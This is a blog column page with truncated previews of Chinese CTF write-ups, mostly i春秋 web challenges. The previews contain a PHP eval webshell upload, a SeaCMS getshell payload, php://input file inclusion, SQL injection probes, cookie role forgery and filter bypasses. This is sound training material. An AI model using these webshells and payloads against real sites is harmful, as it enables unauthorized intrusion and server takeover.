
CTF
文章平均质量分 75
椰奶冻不安全
这个作者很懒,什么都没留下…
展开
-
brainfuck python脚本 && misc题目can_has_stdio?
BrainfuckBrainfuck是一种极小化的计算机语言,它是由Urban Müller在1993年创建的。由于fuck在英语中是脏话,这种语言有时被称为brainf*ck或brainf**k,甚至被简称为BF。这种语言,是一种按照“Turing complete(图灵完备)”思想设计的语言,它的主要设计思路是:用最小的概念实现一种“简单”的语言,BrainF**k 语言只有八种符号,所有的操作都由这八种符号的组合来完成。下面是这八种状态的描述,其中每个状态由一个字符标识:字符含义原创 2021-02-01 20:05:31 · 4028 阅读 · 8 评论 -
i春秋CTF训练 Web 123 常见的Web源码泄露漏洞 Burpsuite Intruder模块简单应用
Web 123 常见的Web源码泄露漏洞 Burpsuite Intruder模块介绍题目内容:12341234,然后就解开了本题来自擂主C26题目链接请在i春秋申请login.php源码里发现提示,用户名+出生年份就是密码,用zhangwei和zhangwei1999试了一下,没错当然登陆失败,只能再想办法了常见的Web源码泄露漏洞git源码泄露Git是一个开源的分布式版本控制系统,每次执行初始化目录的时候会在当前目录下自动创建一个.git目录,用于记录代码的变更记录等s原创 2020-07-05 23:25:32 · 1099 阅读 · 0 评论 -
i春秋CTF训练 Web Test
Web Test题目内容:善于查资料,你就可以拿一血了。题目链接请在i春秋申请根据提示直接在搜索引擎上查询海洋cms漏洞,发现曾经有过前台getshell,用poc试一下searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpa原创 2020-07-05 18:11:55 · 1714 阅读 · 0 评论 -
i春秋CTF训练 Web 破译
Web 破译题目内容:破译下面的密文:TW5650Y - 0TS UZ50S S0V LZW UZ50WKW 9505KL4G 1X WVMUSL510 S001M0UWV 910VSG S0 WFLW0K510 1X LZW54 WF5KL50Y 2S4L0W4KZ52 L1 50U14214SLW X5L0WKK S0V TSK7WLTS88 VWNW8129W0L 50 W8W9W0LS4G, 95VV8W S0V Z5YZ KUZ118K SU41KK UZ50S.LZW S001M0UW9W原创 2020-07-04 22:31:38 · 1234 阅读 · 0 评论 -
i春秋CTF训练 Web Login
Web Login题目内容:加油,我看好你本题由擂主Wfox提供题目链接请在i春秋申请访问发现是个登录页面,还以为是爆破弱口令,结果在页面源码里看到一行注释<!-- test1 test1 -->试了一下成功登录,然后重定向到了member.php页面,发现页面里啥也没有只能用burpsuite抓包看看了,然后在response的headers里发现可疑参数show然后在request的headers里添加一个show参数,值设置为1,发送,页面返回了php源码原创 2020-07-04 21:05:39 · 5706 阅读 · 0 评论 -
i春秋CTF训练 Web Do you know upload?
Web Do you know upload?题目内容:加油吧,少年。题目链接请在i春秋申请一个简单的文件上传,写个一句话命名为2.jpg,用burpsuit抓包后改为2.php上传成功<?php @eval($_POST[cmd]);?>返回了上传路径,用蚁剑连接此路径,密码为cmd,可成功连接查看config.php发现数据库配置信息<?phperror_reporting(0);session_start();$servername = "local原创 2020-07-02 15:18:24 · 672 阅读 · 0 评论 -
i春秋CTF训练 Web broken
Web broken题目内容:http://106.75.72.168:1111/you got a file, but …file指向http://106.75.72.168:1111/fffffaaakk打开页面发现jsfuck加密后的代码复制后放进notepad++里,发现没有与第一个[对应的],在后面补一个,然后删除最后面代表function调用的(),复制放进浏览器的concole执行,得到flag...原创 2020-06-30 18:33:25 · 544 阅读 · 0 评论 -
i春秋CTF训练 Web who are you?
Web who are you?题目内容:http://106.75.72.168:2222/我是谁,我在哪,我要做什么?在文件头发现了Cookierole=Zjo1OiJ0aHJmZyI7将Zjo1OiJ0aHJmZyI7base64解码得到f:5:"thrfg";使用凯撒密码爆破thrfg发现其位移13位是guest故可以用admin的rot-13:nqzva,构造f:5:"nqzva"然后base64加密Zjo1OiJucXp2YSI=用burpsuit抓包改cookie得到原创 2020-06-30 17:51:28 · 707 阅读 · 0 评论 -
i春秋CTF训练 Web include
Web include题目内容:没错!就是文件包含漏洞。链接需到ichunqiu网站申请页面显示出了phpinfo.php的信息以及php源码<?php show_source(__FILE__);if(isset($_REQUEST['path'])){ include($_REQUEST['path']);}else{ include('phpinfo.php');}发现可以直接对path进行利用,构造path=php://input,同时post : &原创 2020-06-30 17:16:39 · 1304 阅读 · 0 评论 -
i春秋CTF训练 Misc Web 爆破-3
Misc Web 爆破-3题目内容:这个真的是爆破。链接需到ichunqiu网站申请页面显示出源码<?php error_reporting(0);session_start();require('./flag.php');if(!isset($_SESSION['nums'])){ $_SESSION['nums'] = 0; $_SESSION['time'] = time(); $_SESSION['whoami'] = 'ea';}if($_SESSIO原创 2020-06-30 16:01:58 · 484 阅读 · 0 评论 -
i春秋CTF训练 Web SQL
Web SQL题目内容:出题人就告诉你这是个注入,有种别走!链接需到ichunqiu网站申请xxx.changame.ichunqiu.com/index.php?id=1xxx.changame.ichunqiu.com/index.php?id=1=1xxx.changame.ichunqiu.com/index.php?id=1=21=1时正常访问,1=2时页面为空白,为数字型注入xxx.changame.ichunqiu.com/index.php?id=1 order b原创 2020-06-27 23:48:12 · 500 阅读 · 0 评论 -
i春秋CTF训练 Web Upload
Misc Web 爆破-2](https://www.ichunqiu.com/battalion?t=1)题目内容:想怎么传就怎么传,就是这么任性。tips:flag在flag.php中链接需到ichunqiu网站申请访问网页得到文件上传输入框明显是文件上传漏洞方法一:上传木马上传小马<?pHp @eval($_POST['123']);?>页面显示@eval($_POST['123']);?> 把<?和php过滤了,可以用大小写绕过php的过原创 2020-06-21 15:08:24 · 1409 阅读 · 0 评论 -
i春秋CTF训练 Misc Web 爆破-2
Misc Web 爆破-2](https://www.ichunqiu.com/battalion?t=1)题目内容:flag不在变量中。链接需到ichunqiu网站申请访问网页得到php代码<?phpinclude "flag.php";$a = @$_REQUEST['hello'];eval( "var_dump($a);");show_source(__FILE__);依旧是通过请求变量hello,再用var_dump()显示,可以考虑文件包含,在url请求flag.原创 2020-06-20 23:52:51 · 678 阅读 · 0 评论 -
i春秋CTF训练 Misc Web 爆破-1
Misc Web 爆破-1题目内容:flag就在某六位变量中。http://8007423c57e9409f94f941eac88ab2157ad7f90842f0497b.changame.ichunqiu.com:80访问网页得到php代码<?phpinclude "flag.php";$a = @$_REQUEST['hello'];if(!preg_match('/^\w*$/',$a )){ die('ERROR');}eval("var_dump($$a);")原创 2020-06-19 23:22:04 · 1192 阅读 · 0 评论